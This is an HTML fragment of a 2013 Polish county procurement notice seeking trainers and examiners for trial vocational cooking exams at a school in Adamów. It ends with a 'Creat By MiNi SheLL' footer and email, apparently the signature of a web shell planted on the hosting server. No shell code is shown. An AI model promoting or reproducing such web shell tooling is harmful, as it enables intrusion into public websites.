<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://splukow.bip4.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łukowie, Wydział Inwestycji i Zamówień Publicznych, 
21-400 Łuków ul. Czerwonego Krzyża 4 pok.4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 11:00, miejsce: Starostwo Powiatowe w Łukowie, 21-400 Łuków 
ul. Piłsudskiego 17, sekretariat pok. 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone jest przez Powiat Łukowski z siedzibą przy ul. Piłsudskiego 17, 21-400 Łuków na podstawie udzielonego przez Zamawiającego pełnomocnictwa do przeprowadzenia postępowania oraz podpisania umowy ws. udzielenia zamówienia publicznego.
Zamówienie realizowane jest w ramach projektu pn. Zasadnicza Szkoła Zawodowa w Adamowie Twoją szansą. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie zajęć przygotowujących do egzaminu zawodowego teoretycznego w zawodzie kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, przeprowadzenie zajęć przygotowujących do egzaminu zawodowego teoretycznego w zawodzie kucharz dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie.
Sposób prowadzenia zajęć: zajęcia prowadzone z uczennicami i uczniami (uczestniczkami i uczestnikami projektu) Zasadniczej Szkoły Zawodowej 
w Adamowie w roku szkolnym: 2013/2014 (semestr II, 7 godz.), 2014/2015 (semestr I i II, 28 godz.)
Forma zajęć: zajęcia prowadzone będą przez cały okres obowiązywania umowy dla 2 grup uczniów łącznie (1 gr. x 21h, 1 gr. x 14h),. Łączna ilość godzin dydaktycznych zajęć - 35 godzin zajęć (1 godzina zajęć = 45 minut). 
Termin realizacji zajęć: od dnia podpisania umowy do 28 lutego 2015 roku - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy
Miejsce realizacji zajęć: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przygotowanie testów sprawdzających wiedzę w zawodzie kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przygotowanie testów sprawdzających wiedzę w zawodzie kucharz  dla uczennic 
i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przygotowanie 8 różnych kompletów testów na każdy 
z 3 egzaminów zawodowych teoretycznych, zgodnie z wymaganiami Okręgowej Komisji Egzaminacyjnej.
Forma: 8 różnych kompletów testów sprawdzających wiedzę w zawodzie kucharz na każdy z 3 egzaminów - 24 różne testy.
Termin realizacji: od dnia podpisania umowy do 24 maja 2013 r. - pierwszy komplet testów, drugi i trzeci  komplet testów najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu dla uczennic i uczniów Zasadniczej Szkoły Zawodowej 
w Adamowie.
Zakres prac do wykonania przeprowadzenie 3 teoretycznych egzaminów zawodowych w zawodzie kucharz 
Forma: przeprowadzenie 3 dwugodzinnych egzaminów 
Przewidywania łączna liczba godzin egzaminów - 6 godzin zegarowych (3 egzaminy x 2 godziny) 
Termin realizacji: od dnia podpisania umowy do 29 maja 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - sprawdzenie testów sprawdzających wiedzę w zawodzie kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - sprawdzenie testów sprawdzających wiedzę w zawodzie kucharz dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie.
Zakres prac do wykonania: sprawdzenie 24 testów sprawdzających wiedzę 
w zawodzie kucharz, zgodnie ze standardami OKE.
Forma: sprawdzenie 24 testów sprawdzających wiedzę w zawodzie kucharz  
(8 testów x 3 grupy)
Termin realizacji: od dnia podpisania umowy do 5 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji zajęć: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przygotowanie zadań z dokumentacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przygotowanie zadań z dokumentacją dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przygotowanie 3 różnych wersji zadań z dokumentacją na każdy z 3 próbnych egzaminów zawodowych praktycznych, zgodnie 
z wymaganiami OKE.
Forma: 3 różne wersje zadań z dokumentacją na każdy z 3 egzaminów zawodowych praktycznych (9 różnych wersji zadań z dokumentacją)
Termin realizacji: od dnia podpisania umowy do 5 czerwca -2013 r. - pierwszy zestaw zadań  drugi i trzeci zestaw zadań najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przeprowadzenie egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przeprowadzenie próbnego egzaminu zawodowego praktycznego dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przeprowadzenie i ocena próbnego egzaminu praktycznego w zawodzie kucharz, zgodnie z wymaganiami OKE 
Forma: przeprowadzenie 3 trzygodzinnych egzaminów
Przewidywania łączna liczba godzin egzaminów - 9 godzin zegarowych (3 egzaminy x 3 godziny) 
Termin realizacji: od dnia podpisania umowy do 12 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin ? najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie.
Zakres prac do wykonania przeprowadzenie 3 teoretycznych egzaminów zawodowych w zawodzie kucharz 
Forma: przeprowadzenie 3 dwugodzinnych egzaminów 
Przewidywania łączna liczba godzin egzaminów - 6 godzin zegarowych (3 egzaminy x 2 godziny) 
Termin realizacji: od dnia podpisania umowy do 29 maja 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbny egzamin zawodowy teoretyczny w zawodzie kucharz - przeprowadzenie egzaminu dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie.
Zakres prac do wykonania przeprowadzenie 3 teoretycznych egzaminów zawodowych w zawodzie kucharz 
Forma: przeprowadzenie 3 dwugodzinnych egzaminów 
Przewidywania łączna liczba godzin egzaminów - 6 godzin zegarowych (3 egzaminy x 2 godziny) 
Termin realizacji: od dnia podpisania umowy do 29 maja 2013 r. - pierwszy egzamin, drugi i trzeci egzamin najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji: pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie
Komisja egzaminacyjna będzie składała się z 3 Wykonawców wyłonionych oddzielnie w części 3, 7 i 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przeprowadzenie egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przeprowadzenie próbnego egzaminu zawodowego praktycznego dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przeprowadzenie i ocena próbnego egzaminu praktycznego w zawodzie kucharz, zgodnie z wymaganiami OKE 
Forma: przeprowadzenie 3 trzygodzinnych egzaminów
Przewidywania łączna liczba godzin egzaminów - 9 godzin zegarowych (3 egzaminy x 3 godziny) 
Termin realizacji: od dnia podpisania umowy do 12 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin ? najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego 
w Adamowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Próbny egzamin zawodowy praktyczny w zawodzie kucharz - przeprowadzenie egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dodatkowe zajęcia, kompetencje zawodowe, próbne egzaminy zawodowe praktyczne w zawodzie kucharz - przeprowadzenie próbnego egzaminu zawodowego praktycznego dla uczennic i uczniów Zasadniczej Szkoły Zawodowej w Adamowie. 
Zakres prac do wykonania: przeprowadzenie i ocena próbnego egzaminu praktycznego w zawodzie kucharz, zgodnie z wymaganiami OKE 
Forma: przeprowadzenie 3 trzygodzinnych egzaminów
Przewidywania łączna liczba godzin egzaminów - 9 godzin zegarowych (3 egzaminy x 3 godziny) 
Termin realizacji: od dnia podpisania umowy do 12 czerwca 2013 r. - pierwszy egzamin, drugi i trzeci egzamin ? najpóźniej do  31 marca 2015 roku - dokładne terminy zostaną ustalone po podpisaniu umowy.
Miejsce realizacji pomieszczenia Zespołu Szkół im. Gen. F. Kamińskiego w Adamowie
Komisja egzaminacyjna będzie składała się z 3 Wykonawców wyłonionych oddzielnie w części 6, 9 i 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 80.21.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com